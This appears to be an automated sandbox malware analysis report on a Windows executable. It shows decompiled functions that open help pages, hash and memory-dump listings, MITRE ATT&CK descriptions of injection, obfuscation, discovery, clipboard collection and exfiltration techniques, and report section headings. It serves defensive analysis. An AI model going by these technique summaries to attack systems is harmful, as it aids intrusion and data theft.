Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB

Strings

options_common.htm, xrefs: 0041916D

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#922H_prolog$#924DesktopWindow
String ID: options_common.htm
API String ID: 4033027120-43166123
Opcode ID: 41bb01c50aba8fb9cd1386a4f855ef7b4ef8f7a8b8476b78af7ca317a28eaaf8
Instruction ID: 1f6994471c1be5fe7fc66e511bade13a4f30b8d7ff053d854556fa4c1eb8ab82
Opcode Fuzzy Hash: 41bb01c50aba8fb9cd1386a4f855ef7b4ef8f7a8b8476b78af7ca317a28eaaf8
Instruction Fuzzy Hash: E8D02BF1B10204FBC708BBE6950372DB7609B98718F00871FB132D62C1CBBC5980422D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B9E9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041B9E9(void* __ecx, void* __esi) {
				void* _t6;
				void* _t9;
				void* _t15;
				intOrPtr _t17;

				_t6 = E0043E4E0(0x441588, _t15);
				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
				_push("options_ftp.htm");
				L0043DE26();
				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
				L004044C9(_t6, _t17, __esi);
				E00422E3C();
				_t9 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
				return _t9;
			}

0x0041b9ee
0x0041b9f7
0x0041b9fa
0x0041b9ff
0x0041ba04
0x0041ba08
0x0041ba0f
0x0041ba19
0x0041ba1a
0x0041ba22

APIs

__EH_prolog.LIBCMT ref: 0041B9EE
#537.MFC42(options_ftp.htm), ref: 0041B9FF

Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB

Strings

options_ftp.htm, xrefs: 0041B9FA

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#922H_prolog$#924DesktopWindow
String ID: options_ftp.htm
API String ID: 4033027120-1390938965
Opcode ID: 1b196a3f6abd0987712e0d3d48fa2d4f21b4d43b33a094a0d7db603059b06d00
Instruction ID: af76ce968a2c387eb146613913a3f26e3e289c81b4d8dfdc8740f49c7ba33b98
Opcode Fuzzy Hash: 1b196a3f6abd0987712e0d3d48fa2d4f21b4d43b33a094a0d7db603059b06d00
Instruction Fuzzy Hash: CDD02BB1B10600F7C718BBEA940376D7760EB88758F008B1FB032D62C1CBBC5940421D

Uniqueness

Uniqueness Score: -1.00%

Function 00419BDE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00419BDE(void* __ecx, void* __esi) {
				void* _t6;
				void* _t9;
				void* _t15;
				intOrPtr _t17;

				_t6 = E0043E4E0(0x4411bc, _t15);
				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
				_push("options_diary.htm");
				L0043DE26();
				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
				L004044C9(_t6, _t17, __esi);
				E00422E3C();
				_t9 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
				return _t9;
			}

0x00419be3
0x00419bec
0x00419bef
0x00419bf4
0x00419bf9
0x00419bfd
0x00419c04
0x00419c0e
0x00419c0f
0x00419c17

APIs

__EH_prolog.LIBCMT ref: 00419BE3
#537.MFC42(options_diary.htm), ref: 00419BF4

Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB

Strings

options_diary.htm, xrefs: 00419BEF

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#922H_prolog$#924DesktopWindow
String ID: options_diary.htm
API String ID: 4033027120-3854651660
Opcode ID: 9a2eb1ae9f09e527d3c0768cb765748e20811746ab68b9da40dcd38f3a5a49a1
Instruction ID: 8677fa96427319e7bbf5c5e0af829bf38f80d6475e3eec2efa39a81e52e7fb65
Opcode Fuzzy Hash: 9a2eb1ae9f09e527d3c0768cb765748e20811746ab68b9da40dcd38f3a5a49a1
Instruction Fuzzy Hash: CBD05BB1B10640B7C718FBE69513B6D77609B99718F10871FB136962D1CBBC5940461D

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC78, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041AC78(void* __ecx, void* __esi) {
				void* _t6;
				void* _t9;
				void* _t15;
				intOrPtr _t17;

				_t6 = E0043E4E0(0x4414a4, _t15);
				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
				_push("options_email.htm");
				L0043DE26();
				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
				L004044C9(_t6, _t17, __esi);
				E00422E3C();
				_t9 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
				return _t9;
			}

0x0041ac7d
0x0041ac86
0x0041ac89
0x0041ac8e
0x0041ac93
0x0041ac97
0x0041ac9e
0x0041aca8
0x0041aca9
0x0041acb1

APIs

__EH_prolog.LIBCMT ref: 0041AC7D
#537.MFC42(options_email.htm), ref: 0041AC8E

Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB

Strings

options_email.htm, xrefs: 0041AC89

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#922H_prolog$#924DesktopWindow
String ID: options_email.htm
API String ID: 4033027120-3085017375
Opcode ID: 77ecca67994cc954ace1917f00a0b0907781166b6e7179f14247ee9b7c7f7c1c
Instruction ID: 97cd2bc070011daa7521a9aa30d31ad19e46e118973a3e9dcd6c23427f6ef106
Opcode Fuzzy Hash: 77ecca67994cc954ace1917f00a0b0907781166b6e7179f14247ee9b7c7f7c1c
Instruction Fuzzy Hash: 60D02BB1F10200BBCB08BBE6E40376D77609B88728F10871FB032972C1CBBC5940461D

Uniqueness

Uniqueness Score: -1.00%

Function 0042807F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0042807F(void* __ecx, void* __esi) {
				void* _t6;
				void* _t8;
				void* _t14;
				intOrPtr _t16;

				_t6 = E0043E4E0(0x442ed0, _t14);
				 *((intOrPtr*)(_t14 - 0x10)) = _t16;
				_push("options_diary.htm");
				L0043DE26();
				 *(_t14 - 4) =  *(_t14 - 4) | 0xffffffff;
				L004044C9(_t6, _t16, __esi);
				_t8 = E00422E3C();
				 *[fs:0x0] =  *((intOrPtr*)(_t14 - 0xc));
				return _t8;
			}

0x00428084
0x0042808d
0x00428090
0x00428095
0x0042809a
0x0042809e
0x004280a5
0x004280ad
0x004280b5

APIs

__EH_prolog.LIBCMT ref: 00428084
#537.MFC42(options_diary.htm,?,?,00428079), ref: 00428095

Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB

Strings

options_diary.htm, xrefs: 00428090

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#922H_prolog$#924DesktopWindow
String ID: options_diary.htm
API String ID: 4033027120-3854651660
Opcode ID: 7946a52a8827aa175a3cfc2e443ecb7369cec42abcffda92d82700fd7502353b
Instruction ID: bf3dc5ef6dd0596eead45175edc45a470cc679b2149de73810c78d6645989072
Opcode Fuzzy Hash: 7946a52a8827aa175a3cfc2e443ecb7369cec42abcffda92d82700fd7502353b
Instruction Fuzzy Hash: 29D05EB0B10600A7CB08BBA6E50772DBA61EB88718F10871FB036662C1CBBC5940451D

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report executable.4420.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

UDP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: executable.4420.exe PID: 5412 Parent PID: 5608

General

Chronological Activities

Analysis Process: WerFault.exe PID: 2100 Parent PID: 5412

Function 00428AD2, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 35
libraryloaderCOMMON

Function 00428DCB, Relevance: 4.5, APIs: 3, Instructions: 24
fileCOMMON

Function 00420972, Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 153
librarystringloaderCOMMON

Function 0041A989, Relevance: 31.5, APIs: 6, Strings: 12, Instructions: 19
COMMON

Function 0042AB81, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 105
libraryloaderCOMMON

Function 00428731, Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 78
COMMON

Function 0043E7AE, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Function 00403E5A, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 19
COMMON

Function 0041B04D, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82
registryCOMMON

Function 0041FE1D, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 71
COMMON

Function 0042211B, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 50
COMMON

Function 00403E2F, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 30
COMMON

Function 00403E41, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 24
COMMON

Function 0041FF1D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
fileCOMMON

Function 0040BBE2, Relevance: 7.6, APIs: 5, Instructions: 54
fileCOMMON

Function 0043EBEA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6
COMMON

Function 0041AFA6, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26
stringCOMMON

Function 004258FF, Relevance: 273.9, APIs: 140, Strings: 16, Instructions: 921
COMMON

Function 0041B588, Relevance: 96.5, APIs: 52, Strings: 3, Instructions: 289
networkstringfileCOMMON

Function 004276F1, Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 211
networkfilestringCOMMON

Function 004247C9, Relevance: 47.4, APIs: 23, Strings: 4, Instructions: 164
fileCOMMON

Function 0042221F, Relevance: 43.9, APIs: 21, Strings: 4, Instructions: 124
filenetworkCOMMON

Function 004251F0, Relevance: 42.1, APIs: 23, Strings: 1, Instructions: 110
fileCOMMON

Function 004255B0, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 163
fileCOMMON

Function 00428E0F, Relevance: 22.6, APIs: 15, Instructions: 93
clipboardstringCOMMON

Function 00410C1A, Relevance: 16.6, APIs: 11, Instructions: 79
networkstringCOMMON

Function 0042980F, Relevance: 12.0, APIs: 8, Instructions: 43
COMMON

Function 0042AAFA, Relevance: 7.6, APIs: 5, Instructions: 53
timefileCOMMONLIBRARYCODE

Function 004288B3, Relevance: 7.5, APIs: 5, Instructions: 49
processCOMMON

Function 0041C947, Relevance: 6.0, APIs: 4, Instructions: 22
windowCOMMON

Function 00429112, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
comCOMMON

Function 00428A6B, Relevance: 1.5, APIs: 1, Instructions: 18
COMMONLIBRARYCODE

Function 004249DD, Relevance: 128.2, APIs: 67, Strings: 6, Instructions: 456
filewindowCOMMON

Function 00429A65, Relevance: 112.4, APIs: 59, Strings: 5, Instructions: 423
COMMON

Function 004292F3, Relevance: 101.9, APIs: 53, Strings: 5, Instructions: 395
COMMON

Function 0040F818, Relevance: 93.0, APIs: 51, Strings: 2, Instructions: 286
COMMONLIBRARYCODE

Function 00426FF6, Relevance: 89.6, APIs: 50, Strings: 1, Instructions: 362
timeCOMMON

Function 00429FDA, Relevance: 84.3, APIs: 44, Strings: 4, Instructions: 349
stringCOMMON

Function 00424065, Relevance: 79.0, APIs: 42, Strings: 3, Instructions: 282
fileCOMMON

